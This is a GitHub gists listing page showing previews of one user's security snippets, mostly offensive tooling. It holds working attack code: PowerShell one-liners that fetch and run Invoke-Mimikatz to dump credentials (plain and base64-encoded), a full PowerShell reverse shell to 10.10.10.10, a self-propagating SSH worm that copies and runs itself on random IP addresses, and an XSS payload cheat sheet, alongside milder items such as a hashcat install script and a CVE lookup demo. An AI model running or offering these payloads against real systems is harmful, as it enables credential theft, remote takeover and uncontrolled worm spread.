ulissescastro’s gists

ulissescastro / pm_mf7b_wipe.py

Created February 17, 2020 10:09 — forked from vulnersCom/pm_mf7b_wipe.py

Mifare S50 7byte UID Gen2 cloning, restoring, wiping back using Proxmark3 RDV4.0

	#! /usr/bin/env python3.6
	# -- coding: utf-8 --
	#
	# VULNERS OPENSOURCE
	# __________________
	#
	# Vulners Project [https://vulners.com]
	# All Rights Reserved.
	#
	# Author: Kir [isox@vulners.com]

ulissescastro / infosec_newbie.md

Created April 19, 2019 01:04 — forked from mubix/infosec_newbie.md

How to start in Infosec

ulissescastro / EmpireSCT.cs

Created April 11, 2019 00:05 — forked from kilogirl/EmpireSCT.cs

	/*
	* SharpPick aka InexorablePoSH
	* Description: Application to load and run powershell code via the .NET assemblies
	* License: 3-Clause BSD License. See Veil PowerTools Project
	*
	* This application is part of Veil PowerTools, a collection of offensive PowerShell
	* capabilities. Hope they help!
	*
	* This is part of a sub-repo of PowerPick, a toolkit used to run PowerShell code without the use of Powershell.exe
	*/

ulissescastro / Quick-Mimikatz

Created April 5, 2019 14:08 — forked from gfoss/Quick-Mimikatz

Quick Mimikatz

	NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!

	#mimikatz
	IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m

	#encoded-mimikatz
	powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAnACkAOwAgACQAbQAgAD0AIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0ARAB1AG0AcABDAHIAZQBkAHMAOwAgACQAbQAKAA==

	#mimikittenz
	IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master

ulissescastro / powershell_reverse_shell.ps1

Created April 5, 2019 12:43 — forked from egre55/powershell_reverse_shell.ps1

powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok

	# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html

	$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535\|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 \| Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

ulissescastro / hashcat_macos.sh

Created April 5, 2019 12:10 — forked from chadmayfield/hashcat_macos.sh

Install Hashcat on macOS

	#!/bin/bash
	git clone https://github.com/hashcat/hashcat.git
	mkdir -p hashcat/deps
	git clone https://github.com/KhronosGroup/OpenCL-Headers.git hashcat/deps/OpenCL
	cd hashcat/ && make
	./hashcat --version
	./hashcat -b -D 1,2
	./example0.sh

ulissescastro / xss_vectors.txt

Created May 16, 2018 18:58 — forked from kurobeats/xss_vectors.txt

XSS Vectors Cheat Sheet

	%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
	<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
	<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">

ulissescastro / w

Created November 18, 2014 01:57

Minimalist worm with ssh, sshpass, yum!

	x=RANDOM%256; s=sshpass; c="$s -pPASS"; yum install $s -y; while :; do t=root@$[x].$[x].$[x].$[x]; $c scp w $t:; $c ssh $t "chmod +x w; ./w"; done

	# random var
	# x=RANDOM%256
	# echo $[x]
	# 117

	# sshpassh executable
	# s=sshpass

ulissescastro / exec-sudo-without-tty

Created November 18, 2014 01:39

Fix Paramiko TTY (sudo)

	#!/usr/bin/env python26
	import paramiko

	ssh = paramiko.SSHClient()
	ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
	ssh.connect(hostname='10.10.10.10', port=22, username='user', password='xxx')
	chan = ssh.get_transport().open_session()
	chan.get_pty()
	chan.exec_command('sudo su -c "id"')
	print(chan.recv(1024))

ulissescastro / mario-cve_wordpress.txt

Created September 26, 2014 00:43

Demo of changes made in Mario Wordpress version check Tool.

	user@host:~/Tools/vFeed$ python cve_wordpress.py 3.3
	(...)

	[CVE-2012-2402]
	wp-admin/plugins.php in WordPress before 3.3.2 allows remote authenticated site administrators to bypass intended access restrictions and deactivate network-wide plugins via unspecified vectors.

	[CVE-2012-2400]
	Unspecified vulnerability in wp-includes/js/swfobject.js in WordPress before 3.3.2 has unknown impact and attack vectors.

	[CVE-2012-1936]

Ulisses Castro ulissescastro